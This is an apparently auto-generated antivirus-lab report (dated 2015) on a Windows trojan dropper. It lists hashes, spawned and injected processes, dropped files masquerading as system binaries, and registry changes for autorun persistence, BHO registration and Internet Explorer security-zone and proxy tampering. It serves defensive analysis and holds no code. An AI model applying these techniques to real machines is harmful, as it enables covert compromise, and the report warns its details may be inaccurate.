Trojan.Crypt.CG_1e098dc6ef

by malwarelabrobot on April 17th, 2015 in Malware Descriptions.

Trojan-Dropper.Win32.Agent.exc (Kaspersky), Trojan.Crypt.CG (B) (Emsisoft), Trojan.Crypt.CG (AdAware), mzpefinder_pcap_file.YR, GenericPhysicalDrive0.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: 1e098dc6ef83586fd05b2b3780e28423
SHA1: 4dd86978354398157650d320a0fddf166774db5f
SHA256: babafe7015fe84adb4e7b0202be2a71699cd8037aa5a82873d5082e933708ed8
SSDeep: 12288:uMhalZMvRhoVYmd4FrFeFdFKFGF7FjFwFvFwxC7pxG5r7I58K65L7sLjqQrJc/QI:uMQlZMveKxOzi2hpgtiC7pxG90SzPymL
Size: 762593 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2007-04-26 09:56:30
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

mstsc.exe:1216
spoolsc.exe:828
ieLock.exe:2548
1210828.exe:720
qqz.exe:1912
misse.exe:1928
%original file name%.exe:512
lasrse.exe:2444
lasrse.exe:3460
mstsv.exe:596
NOTEPAD.EXE:2604
secie.exe:2300
regsvr32.exe:3836
dkdez.exe:2308

The Trojan injects its code into the following process(es):

kisse.exe:2240
serverc.exe:676
svchost.exe:1588
svchost.exe:1884
svchost.exe:3688
svchost.exe:3568

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process ieLock.exe:2548 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Desktop\Internet Explorer.lnk (745 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Explorer.lnk (763 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\~DF4379.tmp (0 bytes)

The process kisse.exe:2240 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\QQNews\QQNews.exe (58 bytes)

The process 1210828.exe:720 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\rasman.dll (1529 bytes)
%System%\rasmanOrg.dll (61 bytes)

The process qqz.exe:1912 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\1210828.exe (601 bytes)

The process %original file name%.exe:512 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\mstsc.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kisse.exe (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\alg.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mstsv.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ope12.bat (44 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\secie.exe (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\lsass.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spoolsv.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\svchost.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\services.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\serverc.exe (1686 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\misse.exe (278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\explorer.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\winlogon.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\qqz.exe (107 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dkdez.exe (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spoolsc.exe (28 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\ope3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\opeA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ope4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\opeE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\opeB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\opeF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ope10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\opeC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ope1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ope7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\opeD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ope5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ope2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ope8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ope9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ope6.tmp (0 bytes)

The process secie.exe:2300 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Helps\ieLock.dll (69 bytes)
%WinDir%\Helps\ielock.ini (72 bytes)
%WinDir%\Helps\ieLock.exe (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ope15.bat (44 bytes)

The Trojan deletes the following file(s):

%WinDir%\Helps\ope13.tmp (0 bytes)
%WinDir%\Helps\ope14.tmp (0 bytes)
%WinDir%\Helps\ope11.tmp (0 bytes)

The process dkdez.exe:2308 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\lasrse.exe (31 bytes)

Registry activity

The process mstsc.exe:1216 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "84 1C 2C B0 06 09 55 FC 98 E1 8D 18 78 9D AF 58"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

The process spoolsc.exe:828 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 B7 F2 11 5A AC 22 7F AE 12 43 80 BD 30 F6 BE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

The process ieLock.exe:2548 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"NetHood" = "%Documents and Settings%\%current user%\NetHood"
"Fonts" = "%WinDir%\Fonts"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
"Flags" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]
"Flags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"PrintHood" = "%Documents and Settings%\%current user%\PrintHood"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
"Flags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]
"Version" = "*"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
"Version" = "*"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"SendTo" = "%Documents and Settings%\%current user%\SendTo"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{2BA1194C-8219-4C38-93DA-2E57F1308DBD}" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
"Version" = "*"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9B 7A CA 93 70 EB 77 FD F6 CD 3A 15 9E F5 DB DB"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu]
"{871C5380-42A0-1069-A2EA-08002B30309D}" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Recent" = "%Documents and Settings%\%current user%\Recent"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{2BA1194C-8219-4C38-93DA-2E57F1308DBD}]
"(Default)" = "RisingBHO"

The process kisse.exe:2240 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 2B 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6A D4 A3 56 8B F3 6F C0 24 46 20 F3 DB C8 7F 9F"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"QQNews" = "%Program Files%\QQNews\QQNews.exe /r"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process 1210828.exe:720 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "95 B0 5C 85 AB 43 01 AE 5F 07 32 03 22 E8 11 9D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process qqz.exe:1912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 2F D6 52 EC 6A 7A B4 BF 0D ED 45 F2 79 9E E6"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process misse.exe:1928 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 28 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB 97 60 15 17 28 6D 19 EE 91 EB 81 3D 2E 9F 16"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:512 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"SERVICES.EXE" = "services"
"lsass.exe" = "lsass"
"mstsc.exe" = "mstsc"
"ope12.bat" = "ope12"
"alg.exe" = "alg"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"secie.exe" = "secie"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"serverc.exe" = "serverc"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"mstsv.exe" = "mstsv"

"dkdez.exe" = "RavCopy Module"
"kisse.exe" = "kisse"
"misse.exe" = "AdSpirit"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 7C 1F 4C 28 C8 0F 43 6E F7 F2 4E 8C 06 00 35"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"explorer.exe" = "explorer"
"spoolsv.exe" = "spoolsv"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"qqz.exe" = "qqz"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"svchost.exe" = "svchost"
"winlogon.exe" = "winlogon"
"spoolsc.exe" = "spoolsc"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process lasrse.exe:2444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "08 A5 63 9B AF 7C 10 D7 54 8C 65 76 8F BA 5E 6D"

[HKLM\System\CurrentControlSet\Services\lasrse]
"Description" = "lasrse"

The process lasrse.exe:3460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "23 16 E5 74 2B CC E1 67 C1 97 C8 7F 2D 6C 73 C1"

The process mstsv.exe:596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "48 DF 74 F9 9A 41 3D E3 DE 2D C0 8A 06 06 BB DB"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

The process NOTEPAD.EXE:2604 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 24 09 52 AB F6 FF 07 A6 7E 49 95 0A 42 D1 99"

The process secie.exe:2300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E 4B F5 4D 89 E5 7F 3F 1A A7 0D E3 F5 61 F6 04"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

